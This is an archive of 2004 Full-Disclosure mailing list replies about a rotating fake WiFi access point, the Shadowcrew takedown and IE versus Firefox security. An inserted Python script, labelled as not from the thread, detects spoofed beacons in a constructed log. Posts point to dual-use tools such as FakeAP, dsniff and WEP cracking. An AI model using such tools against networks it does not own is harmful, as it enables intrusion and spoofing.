It shouldn't take a wireless expert to tell you that...he should try it.

I pick up all types of weird stuff all the time in Kismet..and it looks
like something..but I know it isn't..the SSID is A^B^C^B^D^S^G, or in
other words, trash. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Paul Schmehl
 Sent: Friday, November 19, 2004 10:51 AM
 To: Lachniet, Mark
 Cc: [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] WiFi question
 
 --On Thursday, November 18, 2004 09:32:27 AM -0600 Paul 
 Schmehl [EMAIL PROTECTED] wrote:
 
  --On Wednesday, November 17, 2004 12:41:44 PM -0500 Lachniet, Mark
  [EMAIL PROTECTED] wrote:
 
  Could also be RF interference.  One of my coworkers tracked down a
  particularly interesting problem with motion sensor lights.  Turns
  out the motion sensors worked at the 240 MHz range, which has
  resonance at 2.4 GHz, or something like that.  Hence every time the
  motion sensor worked, it would spew what the wardriving (site survey)
  apps thought was a zillion different access points with widely
  varying MAC addresses.  I would have thought it was a FAKEAP program
  also.  I would assume the same could happen with other interference.
  Having a common SSID would seem to indicate this is not the problem,
  but just thought I'd mention it.
 
  Thanks for a particularly interesting and potentially useful bit of 
  information, Mark.
 
 After forwarding this to our wireless expert, he responded 
 with this (which he has authorized me to forward to the list.)
 
 I find it hard to believe that this is possible.  2.4 GHz is
 the 9th harmonic.  By the time you get to the 4th harmonic of
 a signal, even in very very noisy radiators, the strength of
 the harmonic component of the signal is extremely minute.
 And, given the fact that one of those sensors (which most
 likely does *not* truly operate in the 240 MHz portion of the
 spectrum) will have a very low output (Part 15 device), the
 10th harmonic of that signal will be undetectable as it will
 be at or below the level of background noise.
 
 Finally, if a device managed to get past all of the 
 improbabilities above, the chances of it *accidentally* 
 creating a signal that looked like an
 802.11 beacon packet, complete with preamble, header, etc is 
 so off the charts as to be laughable.
 
 One other thing...  If that device truly was operating at
 240 MHz, then the first harmonic would be 480 MHz.  I'm pretty
 sure that frequency lies in the public service bands (ie
 fire/police).  If not, it's very close.  Given that and the
 fact that the first harmonic would be much stronger than the
 9th harmonic, I'm pretty sure someone in those bands would
 have complained loudly to the FCC as they don't take
 interference issues in those bands lightly.
 
 Paul Schmehl ([EMAIL PROTECTED])
 Adjunct Information Security Officer
 The University of Texas at Dallas
 AVIEN Founding Member
 http://www.utdallas.edu
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Re: controversial shadowcrew site hacked by secret service?

2004-11-18 Thread Todd Towles
That is like asking...why do cops pick up the phone at the home of a
drug dealer? What do you think? They are getting the word out that if
you were a part of this site..that you have not been forgotten.

 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED]
 Sent: Thursday, November 18, 2004 8:17 AM
 Cc: full-disclosure; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Re: controversial shadowcrew site hacked
 by secret service?

 [EMAIL PROTECTED] wrote on 11/17/2004 02:55:08 PM:

  Hello list,
  Mission Impossible theme sounded weird (too weird) and so on...
  Tell me: why should these links be active after the "UNITED STATES
  SECRET SERVICE Operation" ?
  http://www.shadowcrew.com/phpBB2/login.php
  http://archive.shadowcrew.com/Archive/
  Matteo Giannone

 Matteo...you don't suppose maybe law enforcement might leave the site
 and logins up to perhaps generate a list of who is going there, do you?
 Nah, that's way too sneaky and underhanded for our government-types,
 of course. /sarcasm off




RE: [Full-Disclosure] For your pleasure

2004-11-18 Thread Todd Towles
Here is the English version via Babelfish and TinyURL.

In other words, the Microsoft employee who authored these sound files
would have used a pirated version of the SoundForge software.

 http://tinyurl.com/5849c

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Laurent LEVIER
 Sent: Wednesday, November 17, 2004 4:26 PM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] For your pleasure
 
 Guys,
 
 For your pleasure: 
 http://www.materiel.be/n/7685/Des-fichiers-pirates-dans-XP.php
 
 I know, it is in French, but here is my translation, it 
 deserves to be known.
 
 Digging into Windows XP Operating Systems, the journalists
 of PC Welt discovered the following text at the end of the
 files present in the
 C:/Windows/Help/Tours/WindowsMediaPlayer/Audio/Wav directory:
 
 [see the picture at the link]
 
 You have to know that DeepzOne is the nickname of a founding
 member of the Radium cracking group created in 1997 and
 specialized in the cracking of sound oriented software.

 To say it another way, the Microsoft guy who created these
 files used a cracked version of the SoundForge program.
 
 Even if it is probable the Redmond giant has a license of 
 this program (400$), it looks bad to see this when we are 
 hearing everywhere about the Microsoft anti-piracy policy...
 
 Laurent LEVIER
 Systems & Networks Security Expert, CISSP CISM
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Re: controversial shadowcrew site hacked by secret service?

2004-11-18 Thread Todd Towles
But they do own them..lol Seriously.. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
 Sent: Thursday, November 18, 2004 10:03 AM
 To: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Re: controversial shadowcrew 
 site hacked by secret service?
 
 Ok, so it was the secret service who put a new homepage up, 
 but have the secret service done this before with other 
 sites, or is this the first time?
 
 I wish they wouldn't do it in future, it looks too much like "we own
 you kid" behaviour.

 Thanks, n3td3v
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment

2004-11-17 Thread Todd Towles
 I sent this to n3td3v yesterday. Why look into the news..just go to the
DOJ website...st8r to the fish's mouth.

Indictment for hundreds of credit cards, UK passports, state licenses,
school IDs, bank accounts...etc..

 -Original Message-
 From: Todd Towles 
 Sent: Tuesday, November 16, 2004 1:59 PM
 To: 'n3td3v'
 Subject: RE: [Full-Disclosure] Shadowcrew Grand Jury Indictment
 
  
 http://www.usdoj.gov/usao/nj/publicaffairs/NJ_Press/files/pdffiles/firewallindct1028.pdf
 
  -Original Message-
  From: n3td3v [mailto:[EMAIL PROTECTED]
  Sent: Tuesday, November 02, 2004 8:27 PM
  To: Todd Towles
  Subject: Re: [Full-Disclosure] Should the industry be expecting a 
  hacker response to election results?
  
  On Tue, 2 Nov 2004 20:07:28 -0600, Todd Towles 
  [EMAIL PROTECTED] wrote:
   Your message would assume all hackers are for Kerry...that may not be
   true
  
  True, I was really just trying to stir up opinion on the 
 list and it 
  kinda backfired on me.
  

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Mailfilters or how I learned to stop worrying and love the n00bs.

2004-11-17 Thread Todd Towles
Nicely done Skylined. 

Hey Jason,
If you don't like FD... Might want to get on BugTraq..for your
super-clean delayed news.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Berend-Jan Wever
 Sent: Wednesday, November 17, 2004 8:59 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] Mailfilters or how I learned to 
 stop worrying and love the n00bs.
 
 Hey, I just heard of a really cool new technology called mail-filters!
 It works like this:
 
 1) You set up a rule to filter out everything you don't want 
 to read (for instance where the topic contains election fraud).
 2) Go make some coffee, smoke a cigarette, code an exploit, 
 whatever you want to do with all the free time you now have!
 
 Turns out it's not new AT ALL! Every decent mailclient has 
 been supporting it for years!! Is that cool or what !?
 You can even set a filter for specific people (for instance 
 where the from line contains Berend-Jan Wever), so you 
 won't have to read anything I ever send to any list again!
 
 Cheers,
 SkyLined
 
 - Original Message -
 From: Esler, Joel - Contractor [EMAIL PROTECTED]
 To: Jason [EMAIL PROTECTED]; Eric Scher [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Sent: Wednesday, November 17, 2004 15:05
 Subject: RE: [Full-Disclosure] You have sent the attached 
 unsolicited e-mail to an otherwise GOOD security email list.
 
 
  In my opinion, I believe this list should be moderated for 
 about a month
  or so.  Just to weed the bullsh*t off.
  
  J
  
  -Original Message-
  From: [EMAIL PROTECTED]
  [mailto:[EMAIL PROTECTED] On Behalf Of Jason
  Sent: Tuesday, November 16, 2004 10:20 PM
  To: Eric Scher
  Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
  Subject: Re: [Full-Disclosure] You have sent the attached 
 unsolicited
  e-mail to an otherwise GOOD security email list.
  
  
  tell him directly
  
  Gregh [EMAIL PROTECTED]
  
  Eric Scher wrote:
  
   [...]
  
  No point in sticking around to watch this ship finish sinking.
  
  

  
  
  
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] WiFi question

2004-11-17 Thread Todd Towles
If you want to do Kismet, get a Sharp Zaurus handheld and install
OpenZaurus. Been running Dsniff, Kismet and Nmap on my handheld.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of Dave King
 Sent: Wednesday, November 17, 2004 10:52 AM
 To: [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] WiFi question
 
 As far as handheld devices to aid you in your quest go, there 
 are several options.  If you've got a Pocket PC around you 
 can try ministumbler, which is basically the Pocket PC 
 version of netstumbler.  
 It's free and would probably do most of what you want.  If 
 you want more and you're willing to fork out some cash (I 
 believe it's around $3000) AirMagnet can do some really cool 
 stuff but it's probably overkill for you. 
 
 If you're feeling brave and can get a hold of an Ipaq you can
 replace Windows with Familiar Linux (www.handhelds.org) and
 then install Kismet (www.kismetwireless.net) which is a great
 free WiFi detecting/sniffing utility.  Kismet can even work
 with a GPS receiver and triangulate the location of the access
 point (although GPS systems don't tend to work well in
 buildings).  This option is what I use since I could run it on
 an Ipaq I picked up off eBay cheap and it has all the features
 I need, plus it's free.
 
 Laters,
 Dave King
 http://www.thesecure.net
 
 [EMAIL PROTECTED] wrote:
 
 List,
 
 I'm an expert in nothing so when I saw this I had to ask, as I'm sure
 there's someone out there that is a WiFi expert.

 Google has found no answer so here goes.

 Last night we saw a new access point appear. No problems, it's an
 ad-hoc network so it's someone's machine with XP on, configured for
 their home W-LAN probably.  Running Netstumbler shows more on it though.

 You get 2 Access Points showing this ESSID for a few seconds. Then you
 get a 3rd, then a 4th. Then the first two drop off; this repeats
 forever. Always using a different MAC address when a new AP appears.
 The APs are all WEP enabled (which I can't crack cos I don't have the
 savvy or the tools :) ) and this goes on forever.

 The MACs are all from different pools (i.e. assigned to different
 manufacturers) so the only conclusion is that they are all spoofed
 MACs.

 I have walked around the office and as far as I can tell it's coming
 from this office (the IT dept), basing that assumption on signal
 strength.

 Anyone seen any tools that do this?   I would love a little hand-held
 gadget that would help me find it (like the scanner in Alien!)

 Answers on a post card :)

 Colin.
 
 
 
 
 
 *
 **
 ***
 
 This e-mail is confidential and may contain privileged 
 information.  If 
 you are not the addressee or if you have received the e-mail 
 in error, 
 it may be unlawful for you to read, copy, distribute, disclose or 
 otherwise use the information which it contains.  Under these 
 circumstances, please notify us immediately by returning 
 this mail to 
 '[EMAIL PROTECTED]' and deleting this e-mail from your system.
 
 Any views expressed by an individual within this e-mail do not 
 necessarily reflect the views of Cadbury Schweppes Plc or its 
 subsidiaries.  Cadbury Schweppes Plc will not be bound by 
 any agreement 
 entered into as a result of this email, unless its intention 
 is clearly evidenced in the body of the email.
 Whilst we have taken reasonable steps to ensure that this e-mail and 
 attachments are free from viruses, recipients are advised to subject 
 this mail to their own virus checking, in keeping with good 
 computing 
 practice. Please note that email received by Cadbury 
 Schweppes Plc or 
 its subsidiaries may be monitored in accordance with the 
 prevailing law in the United Kingdom.
 
 *
 **
 ***
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] WiFi question

2004-11-17 Thread Todd Towles
I would have to agree with GuidoZ. The changing MAC would point to
something being up. APs using different channels is pretty common in
some models, but the MAC changing and being from different vendors
points to a fake AP.

I bet you 10 bucks the WEP key changes on all but one of them each time
too..lol  

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of GuidoZ
 Sent: Wednesday, November 17, 2004 12:42 PM
 To: [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] WiFi question
 
 I'm not 100% on this, as it could be something I've never 
 heard of (of course). However, it sounds a lot like someone 
 is playing with
 FakeAP:
  - http://www.blackalchemy.to/project/fakeap/
 
 It's not real difficult to set up and only requires a Prism
 chipset card (one or more) and a compatible Linux distro.
 It's been around for over 2 years, but hasn't been touched 
 for about the same amount of time. See the site for more.
 
 --
 Peace. ~G
 
 
 On Wed, 17 Nov 2004 13:53:07 +, [EMAIL PROTECTED] 
 [EMAIL PROTECTED] wrote:
  [...]
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
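An added example, not code from this thread or from the Kismet or FakeAP projects: a small beacon-log analyser that scores the symptom Colin reported and Todd and GuidoZ reasoned about. For each ESSID it counts distinct BSSIDs, distinct OUI blocks (first three octets, the manufacturer allocation) and how long each BSSID stayed on the air, and flags the combination of many unrelated OUIs with every BSSID appearing only briefly. A real AP that uses several channels keeps its OUI and its BSSIDs stay up, so it is not flagged, which is Todd's distinction. The log layout is assumed for the example (Kismet's own output formats differ), and every timestamp and MAC address is constructed; the OUI prefixes are arbitrary and do not identify real vendors.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log, one line per beacon heard, in an assumed layout.
# Every timestamp and MAC address is invented; OUI prefixes are arbitrary.
SAMPLE_LOG = """
2004-11-17 01:00:00 ssid=CORP bssid=00:40:96:12:34:56 ch=1 wep=1
2004-11-17 01:00:00 ssid=CORP bssid=00:40:96:12:34:57 ch=11 wep=1
2004-11-17 01:00:00 ssid=HOMELAN bssid=00:0c:41:7a:01:10 ch=6 wep=1
2004-11-17 01:00:00 ssid=HOMELAN bssid=00:09:5b:3e:22:aa ch=6 wep=1
2004-11-17 01:00:10 ssid=HOMELAN bssid=00:02:2d:9f:55:03 ch=6 wep=1
2004-11-17 01:00:10 ssid=HOMELAN bssid=00:0c:41:7a:01:10 ch=6 wep=1
2004-11-17 01:00:20 ssid=HOMELAN bssid=00:e0:98:c1:4d:21 ch=6 wep=1
2004-11-17 01:00:20 ssid=HOMELAN bssid=00:02:2d:9f:55:03 ch=6 wep=1
2004-11-17 01:00:30 ssid=CORP bssid=00:40:96:12:34:56 ch=1 wep=1
2004-11-17 01:00:30 ssid=CORP bssid=00:40:96:12:34:57 ch=11 wep=1
2004-11-17 01:00:30 ssid=HOMELAN bssid=00:50:f2:aa:bb:cc ch=6 wep=1
2004-11-17 01:01:00 ssid=CORP bssid=00:40:96:12:34:56 ch=1 wep=1
2004-11-17 01:01:00 ssid=CORP bssid=00:40:96:12:34:57 ch=11 wep=1
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"ssid=(?P<ssid>\S+) "
    r"bssid=(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}) "
    r"ch=(?P<ch>\d+) wep=(?P<wep>[01])$"
)


def parse_beacons(lines):
    """Parse log lines into records; lines that do not match are skipped."""
    records = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        records.append({
            "ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
            "ssid": m.group("ssid"),
            "bssid": m.group("bssid").lower(),
            "ch": int(m.group("ch")),
            "wep": m.group("wep") == "1",
        })
    return records


def oui(bssid):
    """First three octets of a MAC: the block assigned to one manufacturer."""
    return bssid[:8]


def assess(records, min_ouis=3, max_lifetime_s=30):
    """Summarise BSSID churn per ESSID and flag the pattern from the thread:
    many BSSIDs from unrelated OUI blocks, each heard only briefly."""
    first_seen, last_seen = {}, {}
    bssids = defaultdict(set)
    channels = defaultdict(set)
    for r in records:
        key = (r["ssid"], r["bssid"])
        first_seen.setdefault(key, r["ts"])
        last_seen[key] = r["ts"]
        bssids[r["ssid"]].add(r["bssid"])
        channels[r["ssid"]].add(r["ch"])

    report = {}
    for ssid, macs in bssids.items():
        ouis = {oui(mac) for mac in macs}
        lifetimes = [(last_seen[(ssid, mac)] - first_seen[(ssid, mac)]).total_seconds()
                     for mac in macs]
        short_lived = all(lt <= max_lifetime_s for lt in lifetimes)
        flag = len(ouis) >= min_ouis and short_lived
        if flag:
            reason = "%d BSSIDs from %d OUI blocks, none heard longer than %ds" % (
                len(macs), len(ouis), max_lifetime_s)
        else:
            # A real AP with several radios or channels keeps one OUI and its
            # BSSIDs stay on the air, so this is the normal case.
            reason = "stable: %d BSSID(s) from %d OUI block(s), seen up to %ds" % (
                len(macs), len(ouis), max(lifetimes))
        report[ssid] = {
            "bssids": len(macs),
            "ouis": len(ouis),
            "channels": sorted(channels[ssid]),
            "flag": flag,
            "reason": reason,
        }
    return report


if __name__ == "__main__":
    for ssid, info in assess(parse_beacons(SAMPLE_LOG.strip().splitlines())).items():
        print(ssid, "FLAG" if info["flag"] else "ok", info["reason"])
```

The thresholds are deliberately loose (three OUI blocks, thirty seconds) so that a site survey over a few minutes separates a rotating fake from a two-radio AP; tighten them against your own baseline before alerting on them.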


RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-16 Thread Todd Towles
 OPENSTEP's Mach/BSD amalgam is the basis for Apple's Mac OS X
operating system.

Is that BSD in there? Ummm...

Apple took over OPENSTEP, no wonder they selected NextStep.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 [EMAIL PROTECTED]
 Sent: Monday, November 15, 2004 1:42 PM
 To: [EMAIL PROTECTED]
 Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 On Sun, Nov 14, 2004 at 11:53:46PM -0600, JxT wrote:
 The BSD layer is based on the BSD kernel, primarily FreeBSD.   That
 information is available on Apple's Developer Site.
  
 
 
 OSX is based on the Mach kernel, not the bsd kernel.
 
 Apple selected OPENSTEP to be the basis for the successor of 
 the classic Mac OS. It became the Cocoa API of Mac OS X. 
 OPENSTEP is in fact an upgraded version of NeXTSTEP, which 
 used Mach 2.5. As such, OPENSTEP's Mach/BSD amalgam is the 
 basis for Apple's Mac OS X operating system.
 
 http://en.wikipedia.org/wiki/Mach_operating_system
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-16 Thread Todd Towles
I agree with you, maybe good coding was the wrong word. But you got the
idea.

IE isn't part of the OS in Microsoft's mind...but it is in the customer's.
You get a new computer and you hear on the TV not to use IE...because
it has holes. A good customer does the right thing and gets another
browser and uses that.  Not knowing that the Outlook and IE problem can
hurt them anyway. Microsoft doesn't show them as separate to the
customer - why? Because people believe they want stuff all connected
together, which is true. Most of the customers don't see what is
happening and it takes professionals like us to get the ball
rolling...to protect them and us.

Microsoft made a bold step by changing security in SP2. It was going to
break stuff...and it was stupid to see people yell about that. They told
us it would, we knew it would. I am glad to see they are starting to
take steps toward better systems, but Microsoft has room for
improvement to say the least.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of joe
 Sent: Monday, November 15, 2004 1:26 PM
 To: [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] IE is just as safe as FireFox
 
  Every time a Firefox exploit comes out..there is already a fix...
  is that magic? No..it is good coding...
 
 What? 
 
 Having a quick fix out is due to low complexity of issue and 
 assisted by a lack of dependencies so you have reduced time 
 for patching and testing. It has nothing to do with code 
 quality. I have seen some extremely good code that hit an 
 issue that took long periods of time to correct due to the 
 complexity of the issue with all of the requirements that had 
 to be stacked up to cause an issue. I have also seen crappy 
 code that could be pretty quickly patched up for various 
 things and often contributed to how crappy it was. Again, 
 code quality and time to patch has nothing to do with each 
 other except if you had great code you wouldn't even have to 
 worry about exploits and patching. Great code, IMO, requires 
 100% assertions of all incoming data and NO ONE does that. 
 Programmers assume that incoming data will fit in a specific 
 range and go with it. At some point we as developers (some 
 earlier than others) learned that we should at least be 
 checking for data length though that still isn't the full 
 assertion that should be done on the quality and state of the 
 data. One reason for not doing a full assertion is for future 
 flexibility, don't check the data too close so you don't have 
 to recompile for a new use. Mostly it is done because coders 
 just don't think someone will do something so off the wall or 
 are too lazy or too pressed for time to care.
 
 
 Saying that, I agree, as I have stated many times on this 
 list, that IE needs to be backed down. If there has to be 
 some piece of it that absolutely has to be in the OS it 
 should be a very basic very small very simple hello world 
 basic HTML only rendering capability - you get fonts and 
 anchors and not much more - it isn't even possible to execute 
 anything even if the user agrees with a signature in blood. 
 The code being tiny and truly a part of the OS in that it 
 isn't possible to upgrade it to IE version x. It is updated 
 with OS updates. Code so small and tight and well controlled 
 and understood and practically memorized by the developers 
 that MS could put a monetary guarantee behind the ability to 
 exploit it. Say HTTP-EQUIV gets $10 million if he finds a way 
 to crack it and run remote exploit code with a realistic POC.  
 
 If someone wants a full function IE, they load that
 separately and it runs in a sandbox as guest. Personally I
 never agreed that IE was truly part of the OS. There are some 
 artificial dependencies built in for some of the display 
 stuff like help, etc but NTFS and threading and all of that 
 works just fine without IE. 
 
 If pulling IE out of the Explorer shell is too difficult. 
 Then I for one would be fully behind a new secure type shell 
 replacement for the Explorer Shell. We had ProgMan Shell for 
 several years then we got the Explorer Shell. Maybe it is 
 time to get a new shell, at least for servers. 
 
 I was recently in Redmond and the message I kept feeding back 
 over and over again was that we needed a way to not have to 
 load IE onto machines. I am looking to moving forward ideas. 
 If they give me the ability, I am not going to whine why I 
 can't do the same on Win9x or 2K or even XP. So many people 
 bitch on this list about MS supporting legacy stuff and then 
 they or someone else starts bitching that MS isn't back 
 porting the changes. Pick one or the other but keep in mind 
 if things have to keep getting back ported, resources for 
 that aren't moving us forward. I myself, would rather move forward. 
 
   joe
 
 
 
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Todd Towles
 Sent: Friday, November 12, 2004 10:10 AM

RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-16 Thread Todd Towles
Darwin and BSD...Darwin is the open source kernel that OS X uses...=)  

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of JxT
 Sent: Tuesday, November 16, 2004 7:45 AM
 To: [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
 Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 I believe it says "The BSD layer is based on the BSD kernel,
 primarily FreeBSD."  It does not say the OSX kernel.

 peep developer.apple.com if you really don't believe me ;-)
 it's a tad more reliable than wikipedia
 
 
 
 -JxT
 
 
 
 On Mon, 15 Nov 2004 11:41:35 -0800, [EMAIL PROTECTED] 
 [EMAIL PROTECTED] wrote:
  [...]
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-16 Thread Todd Towles
It doesn't...I was responding to another off-topic message. But then
again, how many messages on FD stay on topic for more than 10 messages.
=)

Who do you think posted the original "IE is just as safe as FireFox"
message? ;)

So what did your message add to the subject? Other than telling me it was
OT..which is a given.

 -Original Message-
 From: Danny [mailto:[EMAIL PROTECTED] 
 Sent: Tuesday, November 16, 2004 10:28 AM
 To: Todd Towles
 Cc: [EMAIL PROTECTED]
 Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 On Tue, 16 Nov 2004 09:07:56 -0600, Todd Towles 
 [EMAIL PROTECTED] wrote:
  Darwin and BSD...Darwin is the open source kernel that OS X 
 uses...=)
 
 What does this have to do with IE and Firefox, again?
 
 ...D
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-16 Thread Todd Towles
Well, I didn't say it was their legal position..and that was just their
cop out...they know they made it embedded and they know it doesn't have
to be embedded...

Do you truly believe the MS legal position? ;)

 -Original Message-
 From: Gary E. Miller [mailto:[EMAIL PROTECTED] 
 Sent: Tuesday, November 16, 2004 1:09 PM
 To: Todd Towles
 Cc: [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] IE is just as safe as FireFox
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 Yo Todd!
 
 On Tue, 16 Nov 2004, Todd Towles wrote:
 
  IE isn't part of the OS in Microsoft mind...but it is in 
 the customers.
 
 I suggest you re-read about the M$ anti-trust trial.  This
 was certainly NOT the M$ legal position.
 
 RGDS
 GARY
 - ----------------------------------------------------------------
 Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
 [EMAIL PROTECTED]  Tel:+1(541)382-8588 Fax: +1(541)382-8676
 
 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.2.3 (GNU/Linux)
 
 iD8DBQFBmlBX8KZibdeR3qURAokiAJ0Q6tyaHXCr2/pNVH9MicVbDtXwCwCcDL2b
 Qba6K7u6t/bsgjmTZP7zRc4=
 =3ULA
 -END PGP SIGNATURE-
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] controversial shadowcrew site hacked by secret service?

2004-11-16 Thread Todd Towles
What do you think?

 http://www.usdoj.gov/opa/pr/2004/October/04_crm_726.htm

We all knew they were doing fake IDs and the such..it was only time.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
 Sent: Tuesday, November 16, 2004 10:59 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] controversial shadowcrew site 
 hacked by secret service?
 
 The site which was hosting services, like bombs, fake ID and 
 other terrorist stuff is now showing a defacement or 
 replacement page showing words from the intelligence services.
 
 http://www.shadowcrew.com
 
 Is this fake or real? Who knows..
 
 Thanks, n3td3v
 http://www.geocities.com/n3td3v
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-12 Thread Todd Towles
And what do you plan on doing about the unpatched exploits recently
released? There are holes for SP2...ones that haven't even been released
yet...

 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Rafel Ivgi, The-Insider
 Sent: Friday, November 12, 2004 12:44 AM
 To: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] IE is just as safe as FireFox

 That is incorrect, there is a fix -- SP2.
 Users should use the latest updated system, meaning if there is an SP2,
 they should install it.

 Rafel Ivgi, The-Insider
 Security Consultant
 Malicious Code Research Center (MCRC)
 Finjan Software LTD
 E-mail: [EMAIL PROTECTED]
 -Prevention is the best cure!-

 - Original Message -
 From: "Martin Mkrtchian" [EMAIL PROTECTED]
 To: "Todd Towles" [EMAIL PROTECTED]
 Cc: "Mailing List - Full-Disclosure" [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Sent: Friday, November 12, 2004 3:03 AM
 Subject: Re: [Full-Disclosure] IE is just as safe as FireFox

  They should've at least released that statement after they fixed the
  IE FRAME vulnerability. 0 day exploit is in the wild and no fix for
  it, yet they claim its secure enough.

  If the programmers are as smart as the company press releasers, I can
  see why I.E. still sux.

  Martin

  On Thu, 11 Nov 2004 15:59:20 -0600, Todd Towles [EMAIL PROTECTED] wrote:
   Microsoft's security and management product manager (Ben English)
   says...

   At a security roundtable discussion in Sydney on Thursday, Ben
   English, Microsoft's security and management product manager, told
   attendees that IE undergoes "rigorous code reviews" and is no less
   secure than any other browser.

   "Because IE is ubiquitous, you hear a lot more about it, but I don't
   think that Internet Explorer is any less secure than any other
   browser out there," English said.

   http://news.com.com/Microsoft+says+Firefox+not+a+threat+to+IE/2100-1032_3-5448719.html?part=dhttag=ntoptag=nl.e433

   Can anyone say IFRAME? Lol

   -Todd



RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-12 Thread Todd Towles
The first patch for ADODB.stream was just a killbit..and the killbit
only stopped the current attack vector...in a manner of seconds, there
was a second exploit that passed the so called first patch. Stupid, they
think everything is as stupid as their main market.

The problem with IE is its connection to the OS...if you break IE you
break the OS...Microsoft can't clean up the browser without breaking the
OS...then they would have to do a complete secure rebuild. Ohhh..we
wouldn't want to do that..lol 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of Des Ward
 Sent: Friday, November 12, 2004 2:39 AM
 To: [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] IE is just as safe as FireFox
 
 Other browsers may have problems, and often do (In the case 
 of Firefox say) but the time to respond is key here. MS have 
 a real problem going that extra mile when it comes to 
 patching against variants of a vulnerability (ADODB.stream, 
 shell: etc).
 
 Most software has vulnerabilities at some stage, it's how you 
 deal with it.
 -Original Message-
 From: Todd Towles [EMAIL PROTECTED]
 Date: Thu, 11 Nov 2004 15:59:20
 To:Mailing List - Full-Disclosure [EMAIL PROTECTED]
 Cc:[EMAIL PROTECTED]
 Subject:  [Full-Disclosure] IE is just as safe as FireFox
 
 Microsoft's security and management product manager (Ben 
 English) says...
 
  At a security roundtable discussion in Sydney on Thursday, 
 Ben English, Microsoft's security and management product 
 manager, told attendees that IE undergoes "rigorous code 
 reviews" and is no less secure than any other browser. 
 
 "Because IE is ubiquitous, you hear a lot more about it, but 
 I don't think that Internet Explorer is any less secure than 
 any other browser out there," English said. 
 
